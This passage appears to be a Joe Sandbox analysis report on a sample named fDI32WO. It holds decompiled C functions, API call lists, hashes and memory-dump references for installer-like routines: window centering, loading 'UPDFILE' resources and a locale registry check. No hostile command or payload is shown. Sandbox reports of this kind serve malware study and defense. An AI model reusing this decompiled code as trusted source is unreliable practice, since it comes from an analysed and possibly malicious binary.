                                                                                                                                                                                                                                              0x00a82b00
                                                                                                                                                                                                                                              0x00a82b05
                                                                                                                                                                                                                                              0x00a82b05
                                                                                                                                                                                                                                              0x00a82b0b
                                                                                                                                                                                                                                              0x00a82bca
                                                                                                                                                                                                                                              0x00a82bd1
                                                                                                                                                                                                                                              0x00a82b11
                                                                                                                                                                                                                                              0x00a82b18
                                                                                                                                                                                                                                              0x00a82b26
                                                                                                                                                                                                                                              0x00a82b99
                                                                                                                                                                                                                                              0x00a82bc8
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82b9b
                                                                                                                                                                                                                                              0x00a82bae
                                                                                                                                                                                                                                              0x00a82bb3
                                                                                                                                                                                                                                              0x00a82bb5
                                                                                                                                                                                                                                              0x00a82bb5
                                                                                                                                                                                                                                              0x00a82bb8
                                                                                                                                                                                                                                              0x00a82bb8
                                                                                                                                                                                                                                              0x00a82bba
                                                                                                                                                                                                                                              0x00a82bbb
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a82bb8
                                                                                                                                                                                                                                              0x00a82b28
                                                                                                                                                                                                                                              0x00a82b2e
                                                                                                                                                                                                                                              0x00a82b33
                                                                                                                                                                                                                                              0x00a82b39
                                                                                                                                                                                                                                              0x00a82b3c
                                                                                                                                                                                                                                              0x00a82b3c
                                                                                                                                                                                                                                              0x00a82b3e
                                                                                                                                                                                                                                              0x00a82b3f
                                                                                                                                                                                                                                              0x00a82b55
                                                                                                                                                                                                                                              0x00a82b5d
                                                                                                                                                                                                                                              0x00a82b64
                                                                                                                                                                                                                                              0x00a82b64
                                                                                                                                                                                                                                              0x00a82b7a
                                                                                                                                                                                                                                              0x00a82b7f
                                                                                                                                                                                                                                              0x00a82b81
                                                                                                                                                                                                                                              0x00a82b81
                                                                                                                                                                                                                                              0x00a82b84
                                                                                                                                                                                                                                              0x00a82b84
                                                                                                                                                                                                                                              0x00a82b86
                                                                                                                                                                                                                                              0x00a82b87
                                                                                                                                                                                                                                              0x00a82bbf
                                                                                                                                                                                                                                              0x00a82bc1
                                                                                                                                                                                                                                              0x00a82bc1
                                                                                                                                                                                                                                              0x00a82b26
                                                                                                                                                                                                                                              0x00a82bda
                                                                                                                                                                                                                                              0x00a82bda
                                                                                                                                                                                                                                              0x00a82be6
                                                                                                                                                                                                                                              0x00a82be6
                                                                                                                                                                                                                                              0x00a82bf8

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00A82AE6
                                                                                                                                                                                                                                              • IsDBCSLeadByte.KERNEL32(00000000), ref: 00A82AF2
                                                                                                                                                                                                                                              • CharNextA.USER32(?), ref: 00A82B12
                                                                                                                                                                                                                                              • CharUpperA.USER32 ref: 00A82B1E
                                                                                                                                                                                                                                              • CharPrevA.USER32(?,?), ref: 00A82B55
                                                                                                                                                                                                                                              • CharNextA.USER32(?), ref: 00A82BD4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 571164536-0
                                                                                                                                                                                                                                              • Opcode ID: 7d6440228a8df85bda4531755c8825f73dc629034651cad78e161f5b5c486f20
                                                                                                                                                                                                                                              • Instruction ID: b12c8944c907637a7920ad9add9a994ff7d05c4af9039c66e997e95f67b25223
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d6440228a8df85bda4531755c8825f73dc629034651cad78e161f5b5c486f20
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 274103345052855EEB15BF348C58BFE7BB99F66310F18419AE8C287202DB358E87CB61
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                                              			E00A843D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				struct tagRECT _v24;
                                                                                                                                                                                                                                              				struct tagRECT _v40;
                                                                                                                                                                                                                                              				struct HWND__* _v44;
                                                                                                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                                                                                                              				int _v52;
                                                                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                                                                              				int _v60;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                                                                              				void* _t53;
                                                                                                                                                                                                                                              				intOrPtr _t56;
                                                                                                                                                                                                                                              				int _t59;
                                                                                                                                                                                                                                              				struct HWND__* _t63;
                                                                                                                                                                                                                                              				struct HWND__* _t67;
                                                                                                                                                                                                                                              				struct HWND__* _t68;
                                                                                                                                                                                                                                              				struct HDC__* _t69;
                                                                                                                                                                                                                                              				int _t72;
                                                                                                                                                                                                                                              				signed int _t74;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t63 = __edx;
                                                                                                                                                                                                                                              				_t29 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                              				_t68 = __edx;
                                                                                                                                                                                                                                              				_v44 = __ecx;
                                                                                                                                                                                                                                              				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                              				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                                                              				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                              				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                              				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                              				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                              				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                              				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                              				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                              				_t56 = _v48;
                                                                                                                                                                                                                                              				asm("cdq");
                                                                                                                                                                                                                                              				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                              				_t67 = 0;
                                                                                                                                                                                                                                              				if(_t72 >= 0) {
                                                                                                                                                                                                                                              					_t63 = _v52;
                                                                                                                                                                                                                                              					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                              						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t72 = _t67;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				asm("cdq");
                                                                                                                                                                                                                                              				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                              				if(_t59 >= 0) {
                                                                                                                                                                                                                                              					_t63 = _v60;
                                                                                                                                                                                                                                              					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                              						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t59 = _t67;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                              			}
























                                                                                                                                                                                                                                              0x00a843d0
                                                                                                                                                                                                                                              0x00a843d8
                                                                                                                                                                                                                                              0x00a843df
                                                                                                                                                                                                                                              0x00a843e6
                                                                                                                                                                                                                                              0x00a843ec
                                                                                                                                                                                                                                              0x00a843f1
                                                                                                                                                                                                                                              0x00a84400
                                                                                                                                                                                                                                              0x00a84403
                                                                                                                                                                                                                                              0x00a8440b
                                                                                                                                                                                                                                              0x00a84420
                                                                                                                                                                                                                                              0x00a84429
                                                                                                                                                                                                                                              0x00a84437
                                                                                                                                                                                                                                              0x00a84444
                                                                                                                                                                                                                                              0x00a84447
                                                                                                                                                                                                                                              0x00a8444d
                                                                                                                                                                                                                                              0x00a84454
                                                                                                                                                                                                                                              0x00a8445b
                                                                                                                                                                                                                                              0x00a84460
                                                                                                                                                                                                                                              0x00a84461
                                                                                                                                                                                                                                              0x00a84467
                                                                                                                                                                                                                                              0x00a8446f
                                                                                                                                                                                                                                              0x00a84473
                                                                                                                                                                                                                                              0x00a84473
                                                                                                                                                                                                                                              0x00a84463
                                                                                                                                                                                                                                              0x00a84463
                                                                                                                                                                                                                                              0x00a84463
                                                                                                                                                                                                                                              0x00a8447a
                                                                                                                                                                                                                                              0x00a84481
                                                                                                                                                                                                                                              0x00a84484
                                                                                                                                                                                                                                              0x00a8448a
                                                                                                                                                                                                                                              0x00a84492
                                                                                                                                                                                                                                              0x00a84496
                                                                                                                                                                                                                                              0x00a84496
                                                                                                                                                                                                                                              0x00a84486
                                                                                                                                                                                                                                              0x00a84486
                                                                                                                                                                                                                                              0x00a84486
                                                                                                                                                                                                                                              0x00a844b8

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00A843F1
                                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00A8440B
                                                                                                                                                                                                                                              • GetDC.USER32(?), ref: 00A84423
                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00A8442E
                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00A8443A
                                                                                                                                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00A84447
                                                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00A844A2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2212493051-0
                                                                                                                                                                                                                                              • Opcode ID: bcd555bdf411216c044ab4c1b0df1fbfd6d7fa900956562bbd0761d22214f249
                                                                                                                                                                                                                                              • Instruction ID: e637d65dd72cbb5022eab4d2ff518f83e00fccb00e4053fdf9cf46f6e0a9c53e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcd555bdf411216c044ab4c1b0df1fbfd6d7fa900956562bbd0761d22214f249
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86314C72E00119AFDB14DFF8DD899EEBBB5EB89310F154269F805F7250DA70AD068B60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 53%
                                                                                                                                                                                                                                              			E00A86298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t16;
                                                                                                                                                                                                                                              				struct HRSRC__* _t21;
                                                                                                                                                                                                                                              				intOrPtr _t26;
                                                                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                              				intOrPtr* _t40;
                                                                                                                                                                                                                                              				void* _t41;
                                                                                                                                                                                                                                              				intOrPtr* _t44;
                                                                                                                                                                                                                                              				intOrPtr* _t45;
                                                                                                                                                                                                                                              				void* _t47;
                                                                                                                                                                                                                                              				signed int _t50;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t44 = __edx;
                                                                                                                                                                                                                                              				_t16 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                              				_t46 = 0;
                                                                                                                                                                                                                                              				_v32 = __ecx;
                                                                                                                                                                                                                                              				_v36 = 0;
                                                                                                                                                                                                                                              				_t36 = 1;
                                                                                                                                                                                                                                              				E00A8171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                              					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                              					if(_t21 == 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                              					if(_t45 == 0) {
                                                                                                                                                                                                                                              						 *0xa89124 = 0x80070714;
                                                                                                                                                                                                                                              						_t36 = _t46;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                              						_t44 = _t5;
                                                                                                                                                                                                                                              						_t40 = _t44;
                                                                                                                                                                                                                                              						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                              						_t47 = _t6;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t26 =  *_t40;
                                                                                                                                                                                                                                              							_t40 = _t40 + 1;
                                                                                                                                                                                                                                              						} while (_t26 != 0);
                                                                                                                                                                                                                                              						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                              						_t46 = _t51;
                                                                                                                                                                                                                                              						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                              						 *0xa8a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                              						_t30 = _v32();
                                                                                                                                                                                                                                              						if(_t51 != _t51) {
                                                                                                                                                                                                                                              							asm("int 0x29");
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_push(_t45);
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							_t36 = 0;
                                                                                                                                                                                                                                              							FreeResource(??);
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							FreeResource();
                                                                                                                                                                                                                                              							_v36 = _v36 + 1;
                                                                                                                                                                                                                                              							E00A8171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                              							_t46 = 0;
                                                                                                                                                                                                                                              							continue;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					return E00A86CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				goto L12;
                                                                                                                                                                                                                                              			}






















                                                                                                                                                                                                                                              0x00a86298
                                                                                                                                                                                                                                              0x00a862a0
                                                                                                                                                                                                                                              0x00a862a7
                                                                                                                                                                                                                                              0x00a862ad
                                                                                                                                                                                                                                              0x00a862af
                                                                                                                                                                                                                                              0x00a862bb
                                                                                                                                                                                                                                              0x00a862c3
                                                                                                                                                                                                                                              0x00a862c4
                                                                                                                                                                                                                                              0x00a8633b
                                                                                                                                                                                                                                              0x00a8633b
                                                                                                                                                                                                                                              0x00a86345
                                                                                                                                                                                                                                              0x00a8634d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a862da
                                                                                                                                                                                                                                              0x00a862de
                                                                                                                                                                                                                                              0x00a8635f
                                                                                                                                                                                                                                              0x00a86369
                                                                                                                                                                                                                                              0x00a862e0
                                                                                                                                                                                                                                              0x00a862e0
                                                                                                                                                                                                                                              0x00a862e0
                                                                                                                                                                                                                                              0x00a862e3
                                                                                                                                                                                                                                              0x00a862e5
                                                                                                                                                                                                                                              0x00a862e5
                                                                                                                                                                                                                                              0x00a862e8
                                                                                                                                                                                                                                              0x00a862e8
                                                                                                                                                                                                                                              0x00a862ea
                                                                                                                                                                                                                                              0x00a862eb
                                                                                                                                                                                                                                              0x00a862ef
                                                                                                                                                                                                                                              0x00a862f1
                                                                                                                                                                                                                                              0x00a862f3
                                                                                                                                                                                                                                              0x00a86302
                                                                                                                                                                                                                                              0x00a86308
                                                                                                                                                                                                                                              0x00a8630d
                                                                                                                                                                                                                                              0x00a86314
                                                                                                                                                                                                                                              0x00a86314
                                                                                                                                                                                                                                              0x00a86316
                                                                                                                                                                                                                                              0x00a86319
                                                                                                                                                                                                                                              0x00a86355
                                                                                                                                                                                                                                              0x00a86357
                                                                                                                                                                                                                                              0x00a8631b
                                                                                                                                                                                                                                              0x00a8631b
                                                                                                                                                                                                                                              0x00a86331
                                                                                                                                                                                                                                              0x00a86334
                                                                                                                                                                                                                                              0x00a86339
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a86339
                                                                                                                                                                                                                                              0x00a86319
                                                                                                                                                                                                                                              0x00a8636b
                                                                                                                                                                                                                                              0x00a8637d
                                                                                                                                                                                                                                              0x00a8637d
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00A8171E: _vsnprintf.MSVCRT ref: 00A81750
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00A851CA,00000004,00000024,00A82F71,?,00000002,00000000), ref: 00A862CD
                                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A851CA,00000004,00000024,00A82F71,?,00000002,00000000), ref: 00A862D4
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A851CA,00000004,00000024,00A82F71,?,00000002,00000000), ref: 00A8631B
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00A86345
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A851CA,00000004,00000024,00A82F71,?,00000002,00000000), ref: 00A86357
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                              • String ID: UPDFILE%lu
                                                                                                                                                                                                                                              • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                              • Opcode ID: 99a3d5472ed692bae306886f6790a20917b750e0be03d01894e7a946aca3eb6b
                                                                                                                                                                                                                                              • Instruction ID: c7da73c4c4d7eeb5d808152bcab974dbad40864ae3a672f58cd48316c24dc06f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99a3d5472ed692bae306886f6790a20917b750e0be03d01894e7a946aca3eb6b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B421B175A00219ABEB10FFA49C499FEBB7DFB48714B14021AF942A7241DB359D068BE1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E00A8681F(void* __ebx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                                                                              				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                              				void* _v172;
                                                                                                                                                                                                                                              				int* _v176;
                                                                                                                                                                                                                                              				int _v180;
                                                                                                                                                                                                                                              				int _v184;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t19;
                                                                                                                                                                                                                                              				long _t31;
                                                                                                                                                                                                                                              				signed int _t35;
                                                                                                                                                                                                                                              				void* _t36;
                                                                                                                                                                                                                                              				intOrPtr _t41;
                                                                                                                                                                                                                                              				signed int _t44;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t36 = __ebx;
                                                                                                                                                                                                                                              				_t19 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                              				_t41 =  *0xa881d8; // 0xfffffffe
                                                                                                                                                                                                                                              				_t43 = 0;
                                                                                                                                                                                                                                              				_v180 = 0xc;
                                                                                                                                                                                                                                              				_v176 = 0;
                                                                                                                                                                                                                                              				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                              					 *0xa881d8 = 0;
                                                                                                                                                                                                                                              					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                              					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                              						L12:
                                                                                                                                                                                                                                              						_t41 =  *0xa881d8; // 0xfffffffe
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t41 = 1;
                                                                                                                                                                                                                                              						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                              							goto L12;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t31 = RegQueryValueExA(_v172, 0xa81140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                              							_t43 = _t31;
                                                                                                                                                                                                                                              							RegCloseKey(_v172);
                                                                                                                                                                                                                                              							if(_t31 != 0) {
                                                                                                                                                                                                                                              								goto L12;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t40 =  &_v176;
                                                                                                                                                                                                                                              								if(E00A866F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                              									goto L12;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                              									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                              										 *0xa881d8 = _t41;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										goto L12;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E00A86CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              0x00a8681f
                                                                                                                                                                                                                                              0x00a8682a
                                                                                                                                                                                                                                              0x00a86831
                                                                                                                                                                                                                                              0x00a86836
                                                                                                                                                                                                                                              0x00a8683c
                                                                                                                                                                                                                                              0x00a8683e
                                                                                                                                                                                                                                              0x00a86848
                                                                                                                                                                                                                                              0x00a86851
                                                                                                                                                                                                                                              0x00a8685d
                                                                                                                                                                                                                                              0x00a86864
                                                                                                                                                                                                                                              0x00a86876
                                                                                                                                                                                                                                              0x00a8693a
                                                                                                                                                                                                                                              0x00a8693a
                                                                                                                                                                                                                                              0x00a8687c
                                                                                                                                                                                                                                              0x00a8687e
                                                                                                                                                                                                                                              0x00a86885
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a868d6
                                                                                                                                                                                                                                              0x00a868f4
                                                                                                                                                                                                                                              0x00a86900
                                                                                                                                                                                                                                              0x00a86902
                                                                                                                                                                                                                                              0x00a8690a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8690c
                                                                                                                                                                                                                                              0x00a8690c
                                                                                                                                                                                                                                              0x00a8691c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8691e
                                                                                                                                                                                                                                              0x00a86924
                                                                                                                                                                                                                                              0x00a8692b
                                                                                                                                                                                                                                              0x00a86932
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8692b
                                                                                                                                                                                                                                              0x00a8691c
                                                                                                                                                                                                                                              0x00a8690a
                                                                                                                                                                                                                                              0x00a86885
                                                                                                                                                                                                                                              0x00a86876
                                                                                                                                                                                                                                              0x00a86951

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A8686E
                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000004A), ref: 00A868A7
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A868CC
                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00A81140,00000000,?,?,0000000C), ref: 00A868F4
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A86902
                                                                                                                                                                                                                                                • Part of subcall function 00A866F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00A8691A), ref: 00A86741
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • Control Panel\Desktop\ResourceLocale, xrefs: 00A868C2
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                              • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                              • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                              • Opcode ID: ef2ae5620f93c63b6c31007d6e314cab4a279cac06d77bfac12d51566613d898
                                                                                                                                                                                                                                              • Instruction ID: e3854b6f695006b3a25be8f4fb106d3c7413d6b90821ee82e66cb8a7f583c4b1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ef2ae5620f93c63b6c31007d6e314cab4a279cac06d77bfac12d51566613d898
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9319631A00318DFEB31EF51CD45BAAB7B8FB45764F0001A5E94DA6280DB309E86CF52
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A83A3F(void* __eflags) {
